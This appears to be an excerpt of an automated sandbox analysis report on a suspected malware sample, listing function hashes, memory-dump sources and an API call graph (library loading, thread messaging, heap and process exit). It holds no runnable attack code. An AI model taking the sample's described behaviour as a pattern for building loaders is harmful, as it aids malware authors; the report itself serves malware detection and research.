                                                              control_flow_graph 374 67c2600-67c266d CloseHandle 375 67c266f-67c2675 374->375 376 67c2676-67c269e 374->376 375->376
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,067C24B9,?,?), ref: 067C2660
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1429437188.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_67c0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 4ac7e7a5a0560ea4e24be7cf000c1967d0dce688514e1607d2e62326528bc85c
                                                              • Instruction ID: 611e60088dcbb84c210c4c1626d8dae130d90c6be90199b7c645f6773585fe04
                                                              • Opcode Fuzzy Hash: 4ac7e7a5a0560ea4e24be7cf000c1967d0dce688514e1607d2e62326528bc85c
                                                              • Instruction Fuzzy Hash: BC1136B5D00349CFDB20CF99C545BDEBBF4EB48320F14846AD868A7641D338A645CFA5
                                                              Function 00ACD4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426222146.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_acd000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dee07caf34b1c67e10f3c0b6cfec006e949aaf7d81be71dbc77d7e5cf8613024
                                                              • Instruction ID: f82c9fb2b525b7d4f72232890c03e6fa9da33a8a6df4ab6bbeb681ba00bb9376
                                                              • Opcode Fuzzy Hash: dee07caf34b1c67e10f3c0b6cfec006e949aaf7d81be71dbc77d7e5cf8613024
                                                              • Instruction Fuzzy Hash: 73212272500248EFDB05DF14D9C0F26BF65FB88318F21C57DE9090B256C336D856CAA2
                                                              Function 00ACD3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426222146.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_acd000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b97c34bb2081e2e7bf396725405ae3cbcac9ff3ef8e72155377594c3538f13d2
                                                              • Instruction ID: 8649bde71526af4741434a5d61abbdebb0dbdd5630af34e208e4511c5c0a8003
                                                              • Opcode Fuzzy Hash: b97c34bb2081e2e7bf396725405ae3cbcac9ff3ef8e72155377594c3538f13d2
                                                              • Instruction Fuzzy Hash: C2212876500344EFDB08DF10DAC0F16BB65FB94314F21C57DEA094B256C336E856CAA2
                                                              Function 00ADD01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426247302.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_add000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ddaf1f9a44edefb4115f4a3c9e8b469d39059596a4ba25f3c10850328d6cbeff
                                                              • Instruction ID: 4fb8b7d2bf3d8ed3687b1b1af8ee3c0afa8372cc36f48586dcf16a31739dd35b
                                                              • Opcode Fuzzy Hash: ddaf1f9a44edefb4115f4a3c9e8b469d39059596a4ba25f3c10850328d6cbeff
                                                              • Instruction Fuzzy Hash: A521F275604344EFDB14DF24D984B16BB65FBC8314F24C56AE80B4B386C336D847CAA2
                                                              Function 00ADD1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426247302.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_add000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 576b2b15c3bd2e43206684035f3a582b3fcaf3a7d1030bc0729db8e7b8cd3642
                                                              • Instruction ID: 17e0d550c37d89de1da17dece37ece468194bc638260b63d41f13b8183377b58
                                                              • Opcode Fuzzy Hash: 576b2b15c3bd2e43206684035f3a582b3fcaf3a7d1030bc0729db8e7b8cd3642
                                                              • Instruction Fuzzy Hash: A1212671504304EFDB05DF10D9C0B66BBB5FB84314F20C6AEE80A4B392C336D846CA62
                                                              Function 00ADD005 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426247302.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_add000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8230f54a9f93ec6bd4a77b1c77380b2e8f215c4a234acacab0137b285a466f86
                                                              • Instruction ID: dc5451c06526dd3fcddf5e80846d778de4d4f48dfcf192563e01a3d3e0b8ef78
                                                              • Opcode Fuzzy Hash: 8230f54a9f93ec6bd4a77b1c77380b2e8f215c4a234acacab0137b285a466f86
                                                              • Instruction Fuzzy Hash: 932184755093C08FCB16CF24D994715BF71EB85314F28C5DBD84A8B697C33A980ACB62
                                                              Function 00ACD4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426222146.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_acd000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                              • Instruction ID: d3b5cc0e3d8925602e9f8639b34ebecd2a738c027b3e07990e8bc4bfb18d9cf6
                                                              • Opcode Fuzzy Hash: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                              • Instruction Fuzzy Hash: CB11D376504284CFCB15CF14D9C4B16BF71FB94314F24C6ADD8494B656C336D856CBA1
                                                              Function 00ACD3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426222146.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_acd000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                              • Instruction ID: 8d3e31e1cacabbb9c84bcebdb7af1a548933638b6ca7816b315ee95edb5659f0
                                                              • Opcode Fuzzy Hash: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                              • Instruction Fuzzy Hash: 0111D376504240DFCB15CF14DAC4B16BF71FB94324F24C6ADD9094B656C33AE856CBA1
                                                              Function 00ADD1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426247302.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_add000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af0032d31c21eee98164703ed9ecbad4511e5bcd2f12e312fdd1ff5dc5c24f5f
                                                              • Instruction ID: 4f03b0a991d053ef9da1a5a89a50a45e543eb919729858ba337956261febacee
                                                              • Opcode Fuzzy Hash: af0032d31c21eee98164703ed9ecbad4511e5bcd2f12e312fdd1ff5dc5c24f5f
                                                              • Instruction Fuzzy Hash: E811BB75504280DFCB05CF10C5C0B55BBB1FB84314F24C6AAD84A4B796C33AD80ACBA1
                                                              Function 00ACD745 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426222146.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_acd000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ae8162f586bc25bbee3b532234ff6c71038356172040c599cec186ec20d473c8
                                                              • Instruction ID: 6765194b92e52ceaadf116583c87d16eb42028c246e8d6ff296396e68b3c3fe6
                                                              • Opcode Fuzzy Hash: ae8162f586bc25bbee3b532234ff6c71038356172040c599cec186ec20d473c8
                                                              • Instruction Fuzzy Hash: 4801A2315043449AF7205F25CD84F66BBA8DF41724F19C52EED196E282D2799841CAB6
                                                              Function 00ACD744 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426222146.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_acd000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c2d9fbde1fbded1f05ba19e313190a738feeaae19a8ebdbcedccb118df4d94dc
                                                              • Instruction ID: 812149432ab9ecb59fc5a4f0ceae50025134586d2f7b4301e3f85de901a22177
                                                              • Opcode Fuzzy Hash: c2d9fbde1fbded1f05ba19e313190a738feeaae19a8ebdbcedccb118df4d94dc
                                                              • Instruction Fuzzy Hash: 53F06D72405344AEEB208F16CCC8B62FB98EB91734F18C46EED085E286C2799C45CAB1

                                                              Non-executed Functions

                                                              Function 0248DFC4 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.1426469367.0000000002480000.00000040.00000800.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2480000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 78d0423c4751914a63a8fd70ee1e2ef2ada9aa57bd2c44405cb9db77c4c50cfa
                                                              • Instruction ID: da19264faa1409846649237255bc4cbe33a1213806962f730ff265f1fc88ea24
                                                              • Opcode Fuzzy Hash: 78d0423c4751914a63a8fd70ee1e2ef2ada9aa57bd2c44405cb9db77c4c50cfa
                                                              • Instruction Fuzzy Hash: A5A17E32E20215CFCF05EFB5C84059EB7B2FF85304B65456AE805AB265DB35E946CF50

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.3%
                                                              Signature Coverage:8.3%
                                                              Total number of Nodes:132
                                                              Total number of Limit Nodes:10
                                                              execution_graph 95716 4019c0 95717 4019d2 95716->95717 95720 42fd43 95717->95720 95723 42e383 95720->95723 95724 42e3a9 95723->95724 95735 407233 95724->95735 95726 42e3bf 95734 401a51 95726->95734 95738 41b143 95726->95738 95728 42e3de 95729 42e3f3 95728->95729 95753 42cad3 95728->95753 95749 428353 95729->95749 95732 42e40d 95733 42cad3 ExitProcess 95732->95733 95733->95734 95756 4164e3 95735->95756 95737 407240 95737->95726 95739 41b16f 95738->95739 95780 41b033 95739->95780 95742 41b1b4 95745 41b1d0 95742->95745 95747 42c743 NtClose 95742->95747 95743 41b19c 95744 41b1a7 95743->95744 95786 42c743 95743->95786 95744->95728 95745->95728 95748 41b1c6 95747->95748 95748->95728 95750 4283b5 95749->95750 95752 4283c2 95750->95752 95794 418673 95750->95794 95752->95732 95754 42caed 95753->95754 95755 42cafe ExitProcess 95754->95755 95755->95729 95757 4164fd 95756->95757 95759 416513 95757->95759 95760 42d173 95757->95760 95759->95737 95762 42d18d 95760->95762 95761 42d1bc 95761->95759 95762->95761 95767 42bdf3 95762->95767 95768 42be0d 95767->95768 95774 1512c0a 95768->95774 95769 42be36 95771 42e7d3 95769->95771 95777 42ca93 95771->95777 95773 42d232 95773->95759 95775 1512c11 95774->95775 95776 1512c1f LdrInitializeThunk 95774->95776 95775->95769 95776->95769 95778 42caad 95777->95778 95779 42cabb RtlFreeHeap 95778->95779 95779->95773 95781 41b04d 95780->95781 95785 41b129 95780->95785 95789 42be83 95781->95789 95784 42c743 NtClose 95784->95785 95785->95742 95785->95743 95787 42c75d 95786->95787 95788 42c76b NtClose 95787->95788 95788->95744 95790 42be9d 95789->95790 95793 15135c0 LdrInitializeThunk 95790->95793 95791 41b11d 95791->95784 95793->95791 95796 41869d 95794->95796 95795 418bab 95795->95752 95796->95795 95802 413cf3 95796->95802 95798 4187ca 95798->95795 95799 42e7d3 RtlFreeHeap 95798->95799 95800 4187e2 95799->95800 95800->95795 95801 42cad3 ExitProcess 95800->95801 95801->95795 95803 413d13 95802->95803 95805 413d7c 95803->95805 95807 41b453 RtlFreeHeap LdrInitializeThunk 95803->95807 95805->95798 95806 413d72 95806->95798 95807->95806 95808 424e23 95812 424e3c 95808->95812 95809 424e87 95810 42e7d3 RtlFreeHeap 95809->95810 95811 424e97 95810->95811 95812->95809 95813 424eca 95812->95813 95815 424ecf 95812->95815 95814 42e7d3 RtlFreeHeap 95813->95814 95814->95815 95816 42bda3 95817 42bdbd 95816->95817 95820 1512df0 LdrInitializeThunk 95817->95820 95818 42bde2 95820->95818 95842 1512b60 LdrInitializeThunk 95843 42f873 95844 42f883 95843->95844 95845 42f889 95843->95845 95846 42e8b3 RtlAllocateHeap 95845->95846 95847 42f8af 95846->95847 95848 424a93 95849 424aaf 95848->95849 95850 424ad7 95849->95850 95851 424aeb 95849->95851 95853 42c743 NtClose 95850->95853 95852 42c743 NtClose 95851->95852 95855 424af4 95852->95855 95854 424ae0 95853->95854 95858 42e8f3 RtlAllocateHeap 95855->95858 95857 424aff 95858->95857 95821 41e543 95822 41e569 95821->95822 95826 41e666 95822->95826 95827 42f9a3 95822->95827 95824 41e604 95825 42bdf3 LdrInitializeThunk 95824->95825 95824->95826 95825->95826 95828 42f913 95827->95828 95829 42f970 95828->95829 95833 42e8b3 95828->95833 95829->95824 95831 42f94d 95832 42e7d3 RtlFreeHeap 95831->95832 95832->95829 95836 42ca53 95833->95836 95835 42e8ce 95835->95831 95837 42ca6d 95836->95837 95838 42ca7b RtlAllocateHeap 95837->95838 95838->95835 95859 413b13 95862 42c9c3 95859->95862 95863 42c9dd 95862->95863 95866 1512c70 LdrInitializeThunk 95863->95866 95864 413b35 95866->95864 95867 41b333 95868 41b377 95867->95868 95869 41b398 95868->95869 95870 42c743 NtClose 95868->95870 95870->95869 95871 414119 95872 4140a6 95871->95872 95874 414122 95871->95874 95875 4140ba 95872->95875 95878 417813 95872->95878 95876 414106 95875->95876 95877 4140f3 PostThreadMessageW 95875->95877 95877->95876 95879 417837 95878->95879 95880 417873 LdrLoadDll 95879->95880 95881 41783e 95879->95881 95880->95881 95881->95875 95839 418dc8 95840 42c743 NtClose 95839->95840 95841 418dd2 95840->95841

                                                              Executed Functions

                                                              Function 00417813 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 517 417813-41783c call 42f3b3 520 417842-417850 call 42f9b3 517->520 521 41783e-417841 517->521 524 417860-417871 call 42de53 520->524 525 417852-41785d call 42fc53 520->525 530 417873-417887 LdrLoadDll 524->530 531 41788a-41788d 524->531 525->524 530->531
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction ID: 05a5680942dabe8a321efdcf2b6f82430579c081dca23c65dcb556c1d755013b
                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                              • Instruction Fuzzy Hash: 8A0152B1E4010DB7DB10EAA1DC42FDEB3789B14308F4081A6E90897240F674EB48CB95
                                                              Function 0042C743 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 537 42c743-42c779 call 404583 call 42d943 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C774
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction ID: 9e0658677882e74928744a82f9e72dba2eb639633bc470e9b9a98b36903aceda
                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                              • Instruction Fuzzy Hash: 63E04F752002147BC610EA5AEC41E9B775CDFC5724F004419FA48A7241CA75BA11C6A4
                                                              Function 01512B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                              • Instruction ID: 49507d41a2c41417013409a2b8a43c7e2630286e3e28e15953ecad8202877881
                                                              • Opcode Fuzzy Hash: e387755376a784b68fdc7a6ea670e5b6dc14e94db05f839ef27a5f08da7a75d4
                                                              • Instruction Fuzzy Hash: 4490026320241003410571984415616408AA7E1211B59C421E1014994DCA6589916225
                                                              Function 01512DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                              • Instruction ID: d0e498f4c4ed81dab651dbdcd76e70d8c6c27462aae41ed5873ea9d73c9e549b
                                                              • Opcode Fuzzy Hash: 4d4f2e63c09b76b3fecae46bd644940179ec32dc42b9a9070fe70391bab6b7c5
                                                              • Instruction Fuzzy Hash: 6190023320141413D111719845057070089A7D1251F99C812E042495CDDB968A52A221
                                                              Function 01512C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                              • Instruction ID: 5d50df8cbbee2b2bda7aba468b2dc41503c7f9fb2553242b7c26a2e61193905f
                                                              • Opcode Fuzzy Hash: 58fef2394b12cbdb2de877cc1da80abace641805ab6a15542c8f1b140ac7e306
                                                              • Instruction Fuzzy Hash: 1A90023320149802D1107198840574A0085A7D1311F5DC811E4424A5CDCBD589917221
                                                              Function 015135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_14a0000_wSoShbuXnJ.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                              • Instruction ID: a99eb259b985fbca9ff4af18ac9811caae9022af6ffa0c0908f25582513d86bf
                                                              • Opcode Fuzzy Hash: f68158959e1618102f68221b5d6e42e58eb3dfc90dea200d8e2e4ced8788f920
                                                              • Instruction Fuzzy Hash: 7B90023360551402D100719845157061085A7D1211F69C811E042496CDCBD58A5166A2
                                                              Function 00414119 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 132 414119-414120 133 414122-414129 132->133 134 4140a6-4140b4 132->134 137 41412b-41412f 133->137 135 4140ba-4140f1 call 4044f3 call 424f53 134->135 136 4140b5 call 417813 134->136 149 414113-414118 135->149 150 4140f3-414104 PostThreadMessageW 135->150 136->135 139 414131-414136 137->139 140 41414d-414153 137->140 139->140 143 414138-41413d 139->143 140->137 141 414155-414158 140->141 143->140 144 41413f-414146 143->144 146 414159-41415c 144->146 147 414148-41414b 144->147 147->140 147->146 150->149 151 414106-414110 150->151 151->149
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                              • Instruction ID: 26a48773d49b5d4830db5d6a3abe6c0441e01ffa8e7dd764610f6d3443abad5e
                                                              • Opcode Fuzzy Hash: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                              • Instruction Fuzzy Hash: F5117B31D0024879EB309E708C05FEF6B654BD2764F48829AFE14AB3D2D77949C28788
                                                              Function 0041406F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 152 41406f-414070 153 414072-41407a 152->153 154 41408f-4140f1 call 42e873 call 42f283 call 417813 call 4044f3 call 424f53 152->154 165 414113-414118 154->165 166 4140f3-414104 PostThreadMessageW 154->166 166->165 167 414106-414110 166->167 167->165
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                              • Instruction ID: 0f7a8f7452082f141b53ab21a3766a0a1486675bc0825100db931c7ccd50f644
                                                              • Opcode Fuzzy Hash: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                              • Instruction Fuzzy Hash: BA01DF32E4521876E7209791AC02FDEB7689F81B14F40815AFF147B381D6795A0247D9
                                                              Function 0041407C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 168 41407c-414093 170 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 168->170 171 414097 call 42e873 168->171 180 414113-414118 170->180 181 4140f3-414104 PostThreadMessageW 170->181 171->170 181->180 182 414106-414110 181->182 182->180
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                              • Instruction ID: 087d0fd33435a02eb29b34bb39c81c2954cd161ddf22aaec2d78f1b904196256
                                                              • Opcode Fuzzy Hash: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                              • Instruction Fuzzy Hash: 9E112F31E40218B6EB2197E18C02FDF7B7C8F81B44F408069FA047B2C1D7B85A0687E5
                                                              Function 00414083 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 183 414083-414093 184 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 183->184 185 414097 call 42e873 183->185 194 414113-414118 184->194 195 4140f3-414104 PostThreadMessageW 184->195 185->184 195->194 196 414106-414110 195->196 196->194
                                                              APIs
                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                              • API String ID: 1836367815-1005098266
                                                              • Opcode ID: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                              • Instruction ID: 5cdb5b93b2f758ed905246f69099698f9d56dcfdbf049b8bc6d5a2d33433c103
                                                              • Opcode Fuzzy Hash: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                              • Instruction Fuzzy Hash: FA012B31D40218B6EB20A7E18C02FDF7B7C8F81B44F008059FA047B2C1D7B8560687E9
                                                              Function 0042CA93 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 42ca93-42cad1 call 404583 call 42d943 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CACC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_wSoShbuXnJ.jbxd
                                                              Yara matches
                                                              Similarity
